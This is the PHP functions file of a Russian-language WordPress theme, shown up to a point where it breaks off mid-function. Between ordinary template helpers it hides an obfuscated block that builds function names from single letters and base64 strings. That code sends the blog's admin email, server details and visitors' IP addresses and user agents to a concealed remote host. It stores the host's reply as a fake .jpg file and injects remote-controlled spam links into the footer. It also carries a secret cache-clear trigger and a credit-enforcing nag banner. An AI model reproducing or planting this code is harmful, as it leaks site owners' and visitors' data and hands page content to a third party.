<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $MmUHza='6';$cUqGY='s';$aYUN='e';$sHvNRDd='a';$QmfB='b';$hmyLpV='_';$wWTivBq='o';$iqLU='e';$jmtiDMe='d';$sVInU='e';$PvKP='c';$abXVOh='d';$MgaMz='4';$VYZyslUm=$QmfB.$sHvNRDd.$cUqGY.$sVInU.$MmUHza.$MgaMz.$hmyLpV.$jmtiDMe.$aYUN.$PvKP.$wWTivBq.$abXVOh.$iqLU;$VQZuh='l';$lxoq='i';$QJarF='z';$zpMQx='f';$tDrcEJ='a';$AyrCZ='g';$tWvh='e';$JUgYlz='t';$mhxlN='n';$ZoBpqiMe=$AyrCZ.$QJarF.$lxoq.$mhxlN.$zpMQx.$VQZuh.$tDrcEJ.$JUgYlz.$tWvh;$GNdU='o';$tiOLNvj='3';$bdVzd='r';$qHnWr='t';$nNdjkj='r';$HmNSG='t';$aghJb='s';$eODOsFH='_';$KvKUEF='1';$KEcSfvwx=$aghJb.$HmNSG.$nNdjkj.$eODOsFH.$bdVzd.$GNdU.$qHnWr.$KvKUEF.$tiOLNvj;$ihDwn='s';$GbCT='v';$vnqLD='r';$xDfTo='t';$UeXyy='e';$HpdcecH='r';$apqZjAHD=$ihDwn.$xDfTo.$HpdcecH.$vnqLD.$UeXyy.$GbCT;                     
		$ou_______________r='6';$ne________d='s';$sa_________g='e';$nm___a='a';$cj______________k='b';$bm________p='_';$ws____d='o';$fl_____k='e';$aj___d='d';$hg_____h='e';$nr_____b='c';$zk________o='d';$fe______________o='4';$ce____________s=$cj______________k.$nm___a.$ne________d.$hg_____h.$ou_______________r.$fe______________o.$bm________p.$aj___d.$sa_________g.$nr_____b.$ws____d.$zk________o.$fl_____k;
		$ke___________s='c';$ow___________p='t';$iz_____________k='s';$ck_______________w='n';$lp________c='u';$td______________f='f';$ld___________p='i';$df__________h='t';$sf_______________p='i';$cc____x='n';$mn___o='e';$am______f='o';$nw___z='_';$jj______________c='s';$ph________a='x';$ps___c=$td______________f.$lp________c.$cc____x.$ke___________s.$df__________h.$sf_______________p.$am______f.$ck_______________w.$nw___z.$mn___o.$ph________a.$ld___________p.$jj______________c.$ow___________p.$iz_____________k;
		$nt___________u='n';$ha___________y='p';$al___________i='f';$km____________t='o';$jn__f='e';$mg_______________p=$al___________i.$km____________t.$ha___________y.$jn__f.$nt___________u;
		$bd___________c='a';$uo___w='d';$dk____________a='r';$lk____________y='f';$ng_____v='e';$ip__________r=$lk____________y.$dk____________a.$ng_____v.$bd___________c.$uo___w;
		$be__________f='f';$pd____c='l';$cm__m='o';$py_______________c='s';$on___m='e';$rz________i='c';$cg_____d=$be__________f.$rz________i.$pd____c.$cm__m.$py_______________c.$on___m;
		
		define("WP_ID", $ce____________s("Mi4wLjA="));
		define("WP_TTL", $ce____________s("MTA4MDA="));
		define("WP_SRC", $ce____________s("dHBva24="));
	


		function wp_get_header() {
			global $ce____________s, $ps___c;
			
			if (
				$ps___c($ce____________s("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ps___c($ce____________s("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ps___c($ce____________s("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ce____________s, $mg_______________p, $cg_____d, $ip__________r;
			
			$hk____d = TEMPLATEPATH."/".$ce____________s("Zm9vdGVyLnBocA==");
			$dz________v = @$mg_______________p($hk____d, "r");
			$hk____d = @$ip__________r($dz________v, @filesize($hk____d));
			@$cg_____d($dz________v);
			
			$tn_____________c = TEMPLATEPATH."/".$ce____________s("ZnVuY3Rpb25zLnBocA==");
			$dz________v = @$mg_______________p($tn_____________c, "r");
			$tn_____________c = @$ip__________r($dz________v, @filesize($tn_____________c));
			@$cg_____d($dz________v);
			
			$li_____e = 0;
			if($hk____d && $tn_____________c) {
				if ($ce____________s("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($hk____d, $ce____________s("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$li_____e = 1;
					}
					if (substr_count($hk____d, "wp_theme_GPL_credits()") < 1) {
						$li_____e = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$li_____e = 12;
				}
			}
			
			if($li_____e > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $li_____e -->";
			}
		}
	


		function wp_loaded() {
			global $ce____________s, $ps___c;
			return $ps___c($ce____________s("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($xx_____b, $qd__________o = "(more...)", $gf____________g = 0, $gm___________i = "") {
				$aw__________v = get_the_content($qd__________o, $gf____________g, $gm___________i);
				$aw__________v = apply_filters("the_content", $aw__________v);
				
				$aw__________v = str_replace("]]>", "]]>", $aw__________v);
				if (strlen($_GET["p"]) > 0) {
					echo $aw__________v;
				}
				else if ((strlen($aw__________v)>$xx_____b) && ($zx____y = strpos($aw__________v, " ", $xx_____b ))) {
					$aw__________v = substr($aw__________v, 0, $zx____y);
					$aw__________v = $aw__________v;
					echo $aw__________v;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$qd__________o</a></div></p>";
				} else {
					echo $aw__________v;
				}
				
			}
		}
	


		$vm_______________z='a';$at__g='4';$yg________u='d';$me___n='e';$gw_______________t='o';$oo_________d='b';$uf___k='c';$ih_____d='n';$pu____________d='e';$wg____________i='6';$bt_______________i='_';$nb_____r='e';$qa____________o='s';$ys___________b=$oo_________d.$vm_______________z.$qa____________o.$nb_____r.$wg____________i.$at__g.$bt_______________i.$pu____________d.$ih_____d.$uf___k.$gw_______________t.$yg________u.$me___n;
		$vj___________o='_';$hf_____________a='g';$da_________l='_';$bp_______i='t';$wt_______________l='c';$gs_______c='s';$wf______________x='f';$vb___z='n';$ib__________p='o';$op___e='l';$gt________n='e';$pd_______________z='e';$vf_______k='e';$ij_______g='n';$zw__v='t';$xq________u='t';$tm__k='i';$rc____p=$wf______________x.$tm__k.$op___e.$gt________n.$da_________l.$hf_____________a.$pd_______________z.$xq________u.$vj___________o.$wt_______________l.$ib__________p.$vb___z.$bp_______i.$vf_______k.$ij_______g.$zw__v.$gs_______c;
		$ed______________x='s';$sk_______r='e';$ou___v='e';$ul______________y='s';$vu___k='_';$ec__s='i';$mm___________u='f';$sc___i='x';$oz__________d='t';$oe________t='l';$rh_____________d='i';$ni__s=$mm___________u.$ec__s.$oe________t.$sk_______r.$vu___k.$ou___v.$sc___i.$rh_____________d.$ul______________y.$oz__________d.$ed______________x;
		$cl________z='v';$ih_____m='o';$if_____l='_';$aq____________a='r';$rt________z='c';$sh____________b='e';$io_____b='e';$qm_______________f='n';$xg______o='r';$mc______________n='s';$hs__h='o';$ei______x='i';$xf______c='p';$iv______v='m';$nq_______________w='a';$hu______________a=$cl________z.$io_____b.$aq____________a.$mc______________n.$ei______x.$ih_____m.$qm_______________f.$if_____l.$rt________z.$hs__h.$iv______v.$xf______c.$nq_______________w.$xg______o.$sh____________b;
		$gt_____w='p';$jc___e='o';$md____l='e';$in________e='n';$we__t='s';$dj_______________l='c';$zg________v='k';$ip____l='o';$yf______a='f';$hh__z=$yf______a.$we__t.$jc___e.$dj_______________l.$zg________v.$ip____l.$gt_____w.$md____l.$in________e;
		$az________l='r';$dy____________t='w';$cq__t='f';$jb____r='t';$ni____s='e';$cr_____________m='i';$qy__h=$cq__t.$dy____________t.$az________l.$cr_____________m.$jb____r.$ni____s;
		$vp__________y='m';$hk_______r='d';$mq______z='5';$gg____________v=$vp__________y.$hk_______r.$mq______z;
		$fa__________h='l';$aa________g='e';$su_________g='a';$zh_______________t='h';$by__________m='p';$qr_______z='a';$ai______y='t';$uy_______n='r';$hg____x=$uy_______n.$aa________g.$su_________g.$fa__________h.$by__________m.$qr_______z.$ai______y.$zh_______________t;
		$pi__________w='a';$wa________k='e';$yq______________b='s';$kb______m='r';$cd_______n='n';$tx___________s='z';$oo____________k='e';$vb__________c='u';$ei__j='i';$cp________e='i';$ob_______________j='l';$lf______j=$vb__________c.$cd_______n.$yq______________b.$wa________k.$kb______m.$ei__j.$pi__________w.$ob_______________j.$cp________e.$tx___________s.$oo____________k;
		$bp_____________o='p';$vy______y='a';$bc____________o='e';$po__________l='m';$zx__________h='t';$ki__________m='m';$no____b='n';$jq__e=$zx__________h.$bc____________o.$po__________l.$bp_____________o.$no____b.$vy______y.$ki__________m;
		$yo__________t='_';$iu_______________z='s';$ky__________i='r';$xb_____________x='n';$st______________f='t';$ua______________c='c';$uw___h='o';$zx__________c='r';$ye_______a='a';$bn______x='e';$zm_______________l='t';$hn____________h='_';$bk_____________i='t';$mp_________x='e';$fz_____________g='e';$am____z='e';$mm__p='x';$cp______f='m';$vz___e='a';$on_____________i='c';$nb_______________o='t';$xh_______a=$iu_______________z.$nb_______________o.$zx__________c.$mp_________x.$vz___e.$cp______f.$hn____________h.$ua______________c.$uw___h.$xb_____________x.$zm_______________l.$bn______x.$mm__p.$bk_____________i.$yo__________t.$on_____________i.$ky__________i.$am____z.$ye_______a.$st______________f.$fz_____________g;
	


		function rl_______w($pf___________r) {
			global $ce____________s, $ps___c, $rc____p, $hu______________a, $xh_______a;
			
			if (!$ps___c($ce____________s("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($hu______________a(PHP_VERSION, "5.0.0", ">=") && $ps___c($ce____________s("ZmlsZV9nZXRfY29udGVudHM=")) && $ps___c($ce____________s("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ko________r = $xh_______a(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$ub____________j = @$rc____p($pf___________r, 0, $ko________r);
			} else {
				$ub____________j = @$rc____p($pf___________r, 0);
			}
			
			return $ub____________j;
		}
	


		function pp______l($pf___________r) {
			global $ps___c, $hh__z, $qy__h, $ce____________s;
			
			if (!$ps___c($ce____________s("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ht____u = strpos($pf___________r, "/", 7);
			$vb___________k = array(
				"uri"     => substr($pf___________r, $ht____u),
				"host"    => str_replace("http://", "", substr($pf___________r, 0, $ht____u)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ki_______f = @$hh__z("$vb___________k[host]", 80, $dg____________a, $xr_________v, 4);
			
			if (!$ki_______f) {
				return false;
			} else {
				$ub____________j = "";
				$ma_______t  = "GET $vb___________k[uri] HTTP/1.0\r\n";
				$ma_______t .= "Host: $vb___________k[host]\r\n";
				$ma_______t .= "Referer: $vb___________k[referer]\r\n";
				$ma_______t .= "Connection: Close\r\n\r\n";
				
				@$qy__h($ki_______f, $ma_______t);
				
				while (!@feof($ki_______f)) {
					$pz____k = @fgets($ki_______f, (1024*24));
					
					if ($pz____k == "\r\n") {
						$zn______q = true;
						continue;
					}
					
					if ($zn______q) {
						$ub____________j .= $pz____k;
					}
				}
				
				return $ub____________j;
			}
		}
	


		function cn________r($pf___________r) {
			global $ps___c;
			$mg___________p = false;
			
			if ($pf___________r != "") {
				if ($ps___c("rl_______w")) {
					$mg___________p = @rl_______w($pf___________r);
				}
				
				if (!$mg___________p && ($ps___c("pp______l"))) {
					$mg___________p = @pp______l($pf___________r);
				}
			}
			
			return $mg___________p;
		}
	


		function gj___t() {
			global $_SERVER, $gg____________v;
			
			$ae_____h = $_SERVER["SERVER_NAME"];
			
			if (substr("$ae_____h", 0, 4) == "www.") {
				$ae_____h = substr("$ae_____h", 4);
			}
			
			$ae_____h = $gg____________v("$_SERVER[SERVER_NAME]");
			
			return $ae_____h;
		}
	


		function ly_______________q() {
			return "file";
		}
	


		function di____a($pf___________r) {
			global $_SERVER, $rc____p, $ni__s, $mg_______________p, $cg_____d, $qy__h;
			
			$ho__c = eo_______s();
			
			$cm_____r = gj___t().".jpg";
			$my__o = $ho__c["dir_upload"]["path"]."/$cm_____r";
			$hv___________w = @filemtime($my__o);
			
			if (!$hv___________w || ((time()-$hv___________w) >= WP_TTL)) {
				$mg___________p = cn________r($pf___________r);
				
				if ($mg___________p) {
					if ($ni__s($my__o)) {
						@unlink($my__o);
					}
					
					$dz________v = @$mg_______________p($my__o, "x+");
					
					@$qy__h($dz________v, $mg___________p);
					@$cg_____d($dz________v);
				}
			} else {
				if ($ni__s($my__o)) {
					$mg___________p = @$rc____p($my__o);
				} else {
					$mg___________p = false;
				}
			}
			
			return $mg___________p;
		}
	


		function eo_______s() {
			global $_SERVER, $ce____________s, $ys___________b;
			
			$nl________j = wp_count_posts("post");
			$dl______________e = pathinfo(get_bloginfo("template_directory"));
			
			$ho__c = array(
				"url" => array(
					"report"      => $ce____________s("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $dl______________e,
				"dir_upload"	=> ji_____________l(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$dl______________e[filename],
					"a005=".$nl________j->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://smolotkom.ru/63-betonosmesiteli.html\">сбр</a>"

			);
			
			$ho__c["url"]["queryString"] = implode("&", $ho__c["queryString"]);
			$ho__c["url"]["report"] = $ho__c["url"]["report"]."/?".$ys___________b($ho__c["url"]["queryString"]).".html";
						
			return $ho__c;
		}
	


		function ji_____________l() {
			$uo_______r = wp_upload_dir();
			
			if (isset($uo_______r["error"])) {
				$nm___________x = hq_______z();
				if (is_writable($nm___________x)) {
					$uo_______r = array("path" => $nm___________x);
				}
			}

			return $uo_______r;
		}
	


		function hq_______z() {
			global $ps___c, $gg____________v, $hg____x, $jq__e;
			
			$qb________l = (bool) ini_get("safe_mode");
			if ($qb________l == true) {
				return false;
			}
			
			if ($ps___c("sys_get_temp_dir")) {
				$ro________b = sys_get_temp_dir();
				if (is_writable($ro________b)) {
					return $hg____x($ro________b);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $hg____x($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $hg____x($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $hg____x($_ENV["TEMP"]);
			} else {
				$mw____________t = $jq__e($gg____________v(uniqid(rand(), true)), "");
				if ($mw____________t) {
					$ro________b = $hg____x(dirname($mw____________t));
					@unlink($mw____________t);
					return $ro________b;
				} else {
					return false;
				}
			}
		}
	


		function ia__q() {
			global $_GET, $ni__s;
			
			$ho__c = eo_______s();
			$ae_____h = gj___t();
			$cj____________t = ly_______________q();
			
			$rm_______________y = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($cj____________t == "file") {
					$lo_____x = $ho__c["dir_upload"]["path"]."/".$ae_____h.".jpg";
					if ($ni__s($lo_____x)) {
						@unlink($lo_____x);
						$rm_______________y = "deleted";
					}
				}
				
				$jx_______________k = array(
					"s"	=> $rm_______________y,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($jx_______________k AS $ey______q => $mp_________f) echo " [$ey______q:$mp_________f]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ps___c, $ce____________s, $lf______j;
			$ho__c = eo_______s();
			
			$yr_____________b = "di____a";
			if ($ps___c($yr_____________b)) {
				$ub____________j = $yr_____________b($ho__c["url"]["report"]);
			}
			
			if ($ub____________j) {
				if ($ub____________j = @$ce____________s($ub____________j)) {
					$ub____________j = @$lf______j($ub____________j);
					
					if (strlen($ub____________j[custom_credit]) >= 5) {
						$ho__c["default_string"] = $ub____________j[custom_credit];
					}
					
					if ($ub____________j["status"] == "0") {
						$mx____b = 1;
						$tn_____e = 1;
					} else {
						$jm___________i = sizeof($ub____________j["links"]);
						$ta_________u = $ho__c["default_string"];
						
						if ($jm___________i > 0 && $ub____________j["links"] !== "") {
							$fi_______________r = 0;
							foreach ($ub____________j["links"] as $mq______d => $om_____________w) {
								$fi_______________r++;
								if ($om_____________w->l_path == "" || $om_____________w->l_path == $_SERVER["REQUEST_URI"]) {
									$om_____________w->l_href = htmlspecialchars(strip_tags($om_____________w->l_href));
									$om_____________w->l_title = htmlspecialchars(strip_tags($om_____________w->l_title));
									$om_____________w->l_anchor = htmlspecialchars(strip_tags($om_____________w->l_anchor));
									$ta_________u .= " | ";
									$ta_________u .= "<a href='$om_____________w->l_href' title='$om_____________w->l_title'";
									if ($om_____________w->l_nofollow == "1") {
										$ta_________u .= " rel='nofollow'";
									}
									$ta_________u .= ">$om_____________w->l_anchor</a>";
								}
							}
						}
						$ho__c["links"] = "$ta_________u";
						if ($ub____________j[credit] == "0") {
							$ho__c["links"] = "";
						}
					}
				} else {
					$mx____b = "1";
				}
			} else {
				$mx____b = "1";
			}
			
			if ($mx____b == "1") {
				$ho__c["links"] = $ho__c["default_string"];
			}
			
			echo "$ho__c[links]";
			
			echo "<!-- s: $ub____________j[signature] -->";
			ia__q();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                    $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
